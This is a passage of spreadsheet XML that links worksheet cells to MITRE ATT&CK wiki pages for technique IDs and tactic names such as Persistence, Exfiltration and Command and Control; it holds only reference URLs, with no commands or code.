    <hyperlink ref="C87" r:id="rId58" tooltip="Collection" display="https://attack.mitre.org/wiki/Collection"/>
    <hyperlink ref="B92" r:id="rId59" tooltip="Technique/T1116" display="https://attack.mitre.org/wiki/Technique/T1116"/>
    <hyperlink ref="C92" r:id="rId60" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B95" r:id="rId61" tooltip="Technique/T1059" display="https://attack.mitre.org/wiki/Technique/T1059"/>
    <hyperlink ref="C95" r:id="rId62" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B96" r:id="rId63" tooltip="Technique/T1043" display="https://attack.mitre.org/wiki/Technique/T1043"/>
    <hyperlink ref="C96" r:id="rId64" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B106" r:id="rId65" tooltip="Technique/T1092" display="https://attack.mitre.org/wiki/Technique/T1092"/>
    <hyperlink ref="C106" r:id="rId66" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B107" r:id="rId67" tooltip="Technique/T1109" display="https://attack.mitre.org/wiki/Technique/T1109"/>
    <hyperlink ref="C107" r:id="rId68" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C108" r:id="rId69" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B109" r:id="rId70" tooltip="Technique/T1122" display="https://attack.mitre.org/wiki/Technique/T1122"/>
    <hyperlink ref="C109" r:id="rId71" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C110" r:id="rId72" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B111" r:id="rId73" tooltip="Technique/T1090" display="https://attack.mitre.org/wiki/Technique/T1090"/>
    <hyperlink ref="C111" r:id="rId74" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B114" r:id="rId75" tooltip="Technique/T1196" display="https://attack.mitre.org/wiki/Technique/T1196"/>
    <hyperlink ref="C114" r:id="rId76" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C115" r:id="rId77" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B117" r:id="rId78" tooltip="Technique/T1136" display="https://attack.mitre.org/wiki/Technique/T1136"/>
    <hyperlink ref="C117" r:id="rId79" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B118" r:id="rId80" tooltip="Technique/T1003" display="https://attack.mitre.org/wiki/Technique/T1003"/>
    <hyperlink ref="C118" r:id="rId81" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="B173" r:id="rId82" tooltip="Technique/T1081" display="https://attack.mitre.org/wiki/Technique/T1081"/>
    <hyperlink ref="C173" r:id="rId83" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="B174" r:id="rId84" tooltip="Technique/T1214" display="https://attack.mitre.org/wiki/Technique/T1214"/>
    <hyperlink ref="C174" r:id="rId85" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="B178" r:id="rId86" tooltip="Technique/T1094" display="https://attack.mitre.org/wiki/Technique/T1094"/>
    <hyperlink ref="C178" r:id="rId87" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B179" r:id="rId88" tooltip="Technique/T1024" display="https://attack.mitre.org/wiki/Technique/T1024"/>
    <hyperlink ref="C179" r:id="rId89" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B182" r:id="rId90" tooltip="Technique/T1207" display="https://attack.mitre.org/wiki/Technique/T1207"/>
    <hyperlink ref="C182" r:id="rId91" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B185" r:id="rId92" tooltip="Technique/T1038" display="https://attack.mitre.org/wiki/Technique/T1038"/>
    <hyperlink ref="C185" r:id="rId93" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C186" r:id="rId94" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C187" r:id="rId95" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B190" r:id="rId96" tooltip="Technique/T1073" display="https://attack.mitre.org/wiki/Technique/T1073"/>
    <hyperlink ref="C190" r:id="rId97" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B191" r:id="rId98" tooltip="Technique/T1002" display="https://attack.mitre.org/wiki/Technique/T1002"/>
    <hyperlink ref="C191" r:id="rId99" tooltip="Exfiltration" display="https://attack.mitre.org/wiki/Exfiltration"/>
    <hyperlink ref="B192" r:id="rId100" tooltip="Technique/T1132" display="https://attack.mitre.org/wiki/Technique/T1132"/>
    <hyperlink ref="C192" r:id="rId101" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B193" r:id="rId102" tooltip="Technique/T1022" display="https://attack.mitre.org/wiki/Technique/T1022"/>
    <hyperlink ref="C193" r:id="rId103" tooltip="Exfiltration" display="https://attack.mitre.org/wiki/Exfiltration"/>
    <hyperlink ref="B194" r:id="rId104" tooltip="Technique/T1001" display="https://attack.mitre.org/wiki/Technique/T1001"/>
    <hyperlink ref="C194" r:id="rId105" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B195" r:id="rId106" tooltip="Technique/T1074" display="https://attack.mitre.org/wiki/Technique/T1074"/>
    <hyperlink ref="C195" r:id="rId107" tooltip="Collection" display="https://attack.mitre.org/wiki/Collection"/>
    <hyperlink ref="B196" r:id="rId108" tooltip="Technique/T1030" display="https://attack.mitre.org/wiki/Technique/T1030"/>
    <hyperlink ref="C196" r:id="rId109" tooltip="Exfiltration" display="https://attack.mitre.org/wiki/Exfiltration"/>
    <hyperlink ref="B197" r:id="rId110" tooltip="Technique/T1213" display="https://attack.mitre.org/wiki/Technique/T1213"/>
    <hyperlink ref="C197" r:id="rId111" tooltip="Collection" display="https://attack.mitre.org/wiki/Collection"/>
    <hyperlink ref="B212" r:id="rId112" tooltip="Technique/T1005" display="https://attack.mitre.org/wiki/Technique/T1005"/>
    <hyperlink ref="C212" r:id="rId113" tooltip="Collection" display="https://attack.mitre.org/wiki/Collection"/>
    <hyperlink ref="B213" r:id="rId114" tooltip="Technique/T1039" display="https://attack.mitre.org/wiki/Technique/T1039"/>
    <hyperlink ref="C213" r:id="rId115" tooltip="Collection" display="https://attack.mitre.org/wiki/Collection"/>
    <hyperlink ref="B214" r:id="rId116" tooltip="Technique/T1025" display="https://attack.mitre.org/wiki/Technique/T1025"/>
    <hyperlink ref="C214" r:id="rId117" tooltip="Collection" display="https://attack.mitre.org/wiki/Collection"/>
    <hyperlink ref="B215" r:id="rId118" tooltip="Technique/T1140" display="https://attack.mitre.org/wiki/Technique/T1140"/>
    <hyperlink ref="C215" r:id="rId119" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B219" r:id="rId120" tooltip="Technique/T1089" display="https://attack.mitre.org/wiki/Technique/T1089"/>
    <hyperlink ref="C219" r:id="rId121" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B220" r:id="rId122" tooltip="Technique/T1175" display="https://attack.mitre.org/wiki/Technique/T1175"/>
    <hyperlink ref="C220" r:id="rId123" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="B223" r:id="rId124" tooltip="Technique/T1172" display="https://attack.mitre.org/wiki/Technique/T1172"/>
    <hyperlink ref="C223" r:id="rId125" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B224" r:id="rId126" tooltip="Technique/T1189" display="https://attack.mitre.org/wiki/Technique/T1189"/>
    <hyperlink ref="C224" r:id="rId127" tooltip="Initial Access" display="https://attack.mitre.org/wiki/Initial_Access"/>
    <hyperlink ref="B238" r:id="rId128" tooltip="Technique/T1173" display="https://attack.mitre.org/wiki/Technique/T1173"/>
    <hyperlink ref="C238" r:id="rId129" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B241" r:id="rId130" tooltip="Technique/T1114" display="https://attack.mitre.org/wiki/Technique/T1114"/>
    <hyperlink ref="C241" r:id="rId131" tooltip="Collection" display="https://attack.mitre.org/wiki/Collection"/>
    <hyperlink ref="B245" r:id="rId132" tooltip="Technique/T1106" display="https://attack.mitre.org/wiki/Technique/T1106"/>
    <hyperlink ref="C245" r:id="rId133" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B258" r:id="rId134" tooltip="Technique/T1129" display="https://attack.mitre.org/wiki/Technique/T1129"/>
    <hyperlink ref="C258" r:id="rId135" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B265" r:id="rId136" tooltip="Technique/T1048" display="https://attack.mitre.org/wiki/Technique/T1048"/>
    <hyperlink ref="C265" r:id="rId137" tooltip="Exfiltration" display="https://attack.mitre.org/wiki/Exfiltration"/>
    <hyperlink ref="B266" r:id="rId138" tooltip="Technique/T1041" display="https://attack.mitre.org/wiki/Technique/T1041"/>
    <hyperlink ref="C266" r:id="rId139" tooltip="Exfiltration" display="https://attack.mitre.org/wiki/Exfiltration"/>
    <hyperlink ref="B267" r:id="rId140" tooltip="Technique/T1011" display="https://attack.mitre.org/wiki/Technique/T1011"/>
    <hyperlink ref="C267" r:id="rId141" tooltip="Exfiltration" display="https://attack.mitre.org/wiki/Exfiltration"/>
    <hyperlink ref="B268" r:id="rId142" tooltip="Technique/T1052" display="https://attack.mitre.org/wiki/Technique/T1052"/>
    <hyperlink ref="C268" r:id="rId143" tooltip="Exfiltration" display="https://attack.mitre.org/wiki/Exfiltration"/>
    <hyperlink ref="B269" r:id="rId144" tooltip="Technique/T1190" display="https://attack.mitre.org/wiki/Technique/T1190"/>
    <hyperlink ref="C269" r:id="rId145" tooltip="Initial Access" display="https://attack.mitre.org/wiki/Initial_Access"/>
    <hyperlink ref="B270" r:id="rId146" tooltip="Technique/T1203" display="https://attack.mitre.org/wiki/Technique/T1203"/>
    <hyperlink ref="C270" r:id="rId147" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B278" r:id="rId148" tooltip="Technique/T1212" display="https://attack.mitre.org/wiki/Technique/T1212"/>
    <hyperlink ref="C278" r:id="rId149" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="B279" r:id="rId150" tooltip="Technique/T1211" display="https://attack.mitre.org/wiki/Technique/T1211"/>
    <hyperlink ref="C279" r:id="rId151" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B280" r:id="rId152" tooltip="Technique/T1068" display="https://attack.mitre.org/wiki/Technique/T1068"/>
    <hyperlink ref="C280" r:id="rId153" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B281" r:id="rId154" tooltip="Technique/T1210" display="https://attack.mitre.org/wiki/Technique/T1210"/>
    <hyperlink ref="C281" r:id="rId155" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="B285" r:id="rId156" tooltip="Technique/T1133" display="https://attack.mitre.org/wiki/Technique/T1133"/>
    <hyperlink ref="C285" r:id="rId157" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B286" r:id="rId158" tooltip="Technique/T1181" display="https://attack.mitre.org/wiki/Technique/T1181"/>
    <hyperlink ref="C286" r:id="rId159" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C287" r:id="rId160" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B289" r:id="rId161" tooltip="Technique/T1008" display="https://attack.mitre.org/wiki/Technique/T1008"/>
    <hyperlink ref="C289" r:id="rId162" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B290" r:id="rId163" tooltip="Technique/T1107" display="https://attack.mitre.org/wiki/Technique/T1107"/>
    <hyperlink ref="C290" r:id="rId164" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B291" r:id="rId165" tooltip="Technique/T1006" display="https://attack.mitre.org/wiki/Technique/T1006"/>
    <hyperlink ref="C291" r:id="rId166" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B292" r:id="rId167" tooltip="Technique/T1044" display="https://attack.mitre.org/wiki/Technique/T1044"/>
    <hyperlink ref="C292" r:id="rId168" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C293" r:id="rId169" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B298" r:id="rId170" tooltip="Technique/T1083" display="https://attack.mitre.org/wiki/Technique/T1083"/>
    <hyperlink ref="C298" r:id="rId171" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B303" r:id="rId172" tooltip="Technique/T1187" display="https://attack.mitre.org/wiki/Technique/T1187"/>
    <hyperlink ref="C303" r:id="rId173" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="B308" r:id="rId174" tooltip="Technique/T1061" display="https://attack.mitre.org/wiki/Technique/T1061"/>
    <hyperlink ref="C308" r:id="rId175" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B309" r:id="rId176" tooltip="Technique/T1200" display="https://attack.mitre.org/wiki/Technique/T1200"/>
    <hyperlink ref="C309" r:id="rId177" tooltip="Initial Access" display="https://attack.mitre.org/wiki/Initial_Access"/>
    <hyperlink ref="B310" r:id="rId178" tooltip="Technique/T1158" display="https://attack.mitre.org/wiki/Technique/T1158"/>
    <hyperlink ref="C310" r:id="rId179" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C311" r:id="rId180" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B318" r:id="rId181" tooltip="Technique/T1179" display="https://attack.mitre.org/wiki/Technique/T1179"/>
    <hyperlink ref="C318" r:id="rId182" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="C319" r:id="rId183" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C320" r:id="rId184" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B326" r:id="rId185" tooltip="Technique/T1062" display="https://attack.mitre.org/wiki/Technique/T1062"/>
    <hyperlink ref="C326" r:id="rId186" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B327" r:id="rId187" tooltip="Technique/T1183" display="https://attack.mitre.org/wiki/Technique/T1183"/>
    <hyperlink ref="C327" r:id="rId188" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C328" r:id="rId189" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C329" r:id="rId190" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B331" r:id="rId191" tooltip="Technique/T1054" display="https://attack.mitre.org/wiki/Technique/T1054"/>
    <hyperlink ref="C331" r:id="rId192" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B332" r:id="rId193" tooltip="Technique/T1066" display="https://attack.mitre.org/wiki/Technique/T1066"/>
    <hyperlink ref="C332" r:id="rId194" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B333" r:id="rId195" tooltip="Technique/T1070" display="https://attack.mitre.org/wiki/Technique/T1070"/>
    <hyperlink ref="C333" r:id="rId196" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B334" r:id="rId197" tooltip="Technique/T1202" display="https://attack.mitre.org/wiki/Technique/T1202"/>
    <hyperlink ref="C334" r:id="rId198" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B335" r:id="rId199" tooltip="Technique/T1056" display="https://attack.mitre.org/wiki/Technique/T1056"/>
    <hyperlink ref="C335" r:id="rId200" tooltip="Collection" display="https://attack.mitre.org/wiki/Collection"/>
    <hyperlink ref="C336" r:id="rId201" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="B339" r:id="rId202" tooltip="Technique/T1130" display="https://attack.mitre.org/wiki/Technique/T1130"/>
    <hyperlink ref="C339" r:id="rId203" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B344" r:id="rId204" tooltip="Technique/T1118" display="https://attack.mitre.org/wiki/Technique/T1118"/>
    <hyperlink ref="C344" r:id="rId205" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C345" r:id="rId206" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B346" r:id="rId207" tooltip="Technique/T1208" display="https://attack.mitre.org/wiki/Technique/T1208"/>
    <hyperlink ref="C346" r:id="rId208" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="B350" r:id="rId209" tooltip="Technique/T1171" display="https://attack.mitre.org/wiki/Technique/T1171"/>
    <hyperlink ref="C350" r:id="rId210" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="B353" r:id="rId211" tooltip="Technique/T1177" display="https://attack.mitre.org/wiki/Technique/T1177"/>
    <hyperlink ref="C353" r:id="rId212" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="C354" r:id="rId213" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B355" r:id="rId214" tooltip="Technique/T1037" display="https://attack.mitre.org/wiki/Technique/T1037"/>
    <hyperlink ref="C355" r:id="rId215" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="C356" r:id="rId216" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B360" r:id="rId217" tooltip="Technique/T1185" display="https://attack.mitre.org/wiki/Technique/T1185"/>
    <hyperlink ref="C360" r:id="rId218" tooltip="Collection" display="https://attack.mitre.org/wiki/Collection"/>
    <hyperlink ref="B363" r:id="rId219" tooltip="Technique/T1036" display="https://attack.mitre.org/wiki/Technique/T1036"/>
    <hyperlink ref="C363" r:id="rId220" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B372" r:id="rId221" tooltip="Technique/T1031" display="https://attack.mitre.org/wiki/Technique/T1031"/>
    <hyperlink ref="C372" r:id="rId222" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B375" r:id="rId223" tooltip="Technique/T1112" display="https://attack.mitre.org/wiki/Technique/T1112"/>
    <hyperlink ref="C375" r:id="rId224" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B378" r:id="rId225" tooltip="Technique/T1170" display="https://attack.mitre.org/wiki/Technique/T1170"/>
    <hyperlink ref="C378" r:id="rId226" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C379" r:id="rId227" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B383" r:id="rId228" tooltip="Technique/T1104" display="https://attack.mitre.org/wiki/Technique/T1104"/>
    <hyperlink ref="C383" r:id="rId229" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B386" r:id="rId230" tooltip="Technique/T1188" display="https://attack.mitre.org/wiki/Technique/T1188"/>
    <hyperlink ref="C386" r:id="rId231" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B387" r:id="rId232" tooltip="Technique/T1026" display="https://attack.mitre.org/wiki/Technique/T1026"/>
    <hyperlink ref="C387" r:id="rId233" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B388" r:id="rId234" tooltip="Technique/T1079" display="https://attack.mitre.org/wiki/Technique/T1079"/>
    <hyperlink ref="C388" r:id="rId235" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B389" r:id="rId236" tooltip="Technique/T1096" display="https://attack.mitre.org/wiki/Technique/T1096"/>
    <hyperlink ref="C389" r:id="rId237" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B390" r:id="rId238" tooltip="Technique/T1128" display="https://attack.mitre.org/wiki/Technique/T1128"/>
    <hyperlink ref="C390" r:id="rId239" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B393" r:id="rId240" tooltip="Technique/T1046" display="https://attack.mitre.org/wiki/Technique/T1046"/>
    <hyperlink ref="C393" r:id="rId241" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B394" r:id="rId242" tooltip="Technique/T1126" display="https://attack.mitre.org/wiki/Technique/T1126"/>
    <hyperlink ref="C394" r:id="rId243" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B395" r:id="rId244" tooltip="Technique/T1135" display="https://attack.mitre.org/wiki/Technique/T1135"/>
    <hyperlink ref="C395" r:id="rId245" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B402" r:id="rId246" tooltip="Technique/T1040" display="https://attack.mitre.org/wiki/Technique/T1040"/>
    <hyperlink ref="C402" r:id="rId247" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="B403" r:id="rId248" tooltip="Technique/T1050" display="https://attack.mitre.org/wiki/Technique/T1050"/>
    <hyperlink ref="C403" r:id="rId249" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C404" r:id="rId250" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B405" r:id="rId251" tooltip="Technique/T1027" display="https://attack.mitre.org/wiki/Technique/T1027"/>
    <hyperlink ref="C405" r:id="rId252" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B410" r:id="rId253" tooltip="Technique/T1137" display="https://attack.mitre.org/wiki/Technique/T1137"/>
    <hyperlink ref="C410" r:id="rId254" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B423" r:id="rId255" tooltip="Technique/T1075" display="https://attack.mitre.org/wiki/Technique/T1075"/>
    <hyperlink ref="C423" r:id="rId256" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="B424" r:id="rId257" tooltip="Technique/T1097" display="https://attack.mitre.org/wiki/Technique/T1097"/>
    <hyperlink ref="C424" r:id="rId258" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="B428" r:id="rId259" tooltip="Technique/T1174" display="https://attack.mitre.org/wiki/Technique/T1174"/>
    <hyperlink ref="C428" r:id="rId260" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="B431" r:id="rId261" tooltip="Technique/T1201" display="https://attack.mitre.org/wiki/Technique/T1201"/>
    <hyperlink ref="C431" r:id="rId262" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B441" r:id="rId263" tooltip="Technique/T1034" display="https://attack.mitre.org/wiki/Technique/T1034"/>
    <hyperlink ref="C441" r:id="rId264" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C442" r:id="rId265" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B452" r:id="rId266" tooltip="Technique/T1120" display="https://attack.mitre.org/wiki/Technique/T1120"/>
    <hyperlink ref="C452" r:id="rId267" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B453" r:id="rId268" tooltip="Technique/T1069" display="https://attack.mitre.org/wiki/Technique/T1069"/>
    <hyperlink ref="C453" r:id="rId269" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B460" r:id="rId270" tooltip="Technique/T1013" display="https://attack.mitre.org/wiki/Technique/T1013"/>
    <hyperlink ref="C460" r:id="rId271" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C461" r:id="rId272" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B466" r:id="rId273" tooltip="Technique/T1086" display="https://attack.mitre.org/wiki/Technique/T1086"/>
    <hyperlink ref="C466" r:id="rId274" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B470" r:id="rId275" tooltip="Technique/T1145" display="https://attack.mitre.org/wiki/Technique/T1145"/>
    <hyperlink ref="C470" r:id="rId276" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="B474" r:id="rId277" tooltip="Technique/T1057" display="https://attack.mitre.org/wiki/Technique/T1057"/>
    <hyperlink ref="C474" r:id="rId278" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B479" r:id="rId279" tooltip="Technique/T1186" display="https://attack.mitre.org/wiki/Technique/T1186"/>
    <hyperlink ref="C479" r:id="rId280" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B487" r:id="rId281" tooltip="Technique/T1093" display="https://attack.mitre.org/wiki/Technique/T1093"/>
    <hyperlink ref="C487" r:id="rId282" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B488" r:id="rId283" tooltip="Technique/T1055" display="https://attack.mitre.org/wiki/Technique/T1055"/>
    <hyperlink ref="C488" r:id="rId284" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C489" r:id="rId285" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B503" r:id="rId286" tooltip="Technique/T1012" display="https://attack.mitre.org/wiki/Technique/T1012"/>
    <hyperlink ref="C503" r:id="rId287" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B504" r:id="rId288" tooltip="Technique/T1108" display="https://attack.mitre.org/wiki/Technique/T1108"/>
    <hyperlink ref="C504" r:id="rId289" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C505" r:id="rId290" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B506" r:id="rId291" tooltip="Technique/T1060" display="https://attack.mitre.org/wiki/Technique/T1060"/>
    <hyperlink ref="C506" r:id="rId292" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B507" r:id="rId293" tooltip="Technique/T1121" display="https://attack.mitre.org/wiki/Technique/T1121"/>
    <hyperlink ref="C507" r:id="rId294" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C508" r:id="rId295" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B509" r:id="rId296" tooltip="Technique/T1117" display="https://attack.mitre.org/wiki/Technique/T1117"/>
    <hyperlink ref="C509" r:id="rId297" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C510" r:id="rId298" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B513" r:id="rId299" tooltip="Technique/T1219" display="https://attack.mitre.org/wiki/Technique/T1219"/>
    <hyperlink ref="C513" r:id="rId300" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
    <hyperlink ref="B516" r:id="rId301" tooltip="Technique/T1076" display="https://attack.mitre.org/wiki/Technique/T1076"/>
    <hyperlink ref="C516" r:id="rId302" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="B519" r:id="rId303" tooltip="Technique/T1105" display="https://attack.mitre.org/wiki/Technique/T1105"/>
    <hyperlink ref="C519" r:id="rId304" tooltip="Command and Control" display="https://attack.mitre.org/wiki/Command_and_Control"/>
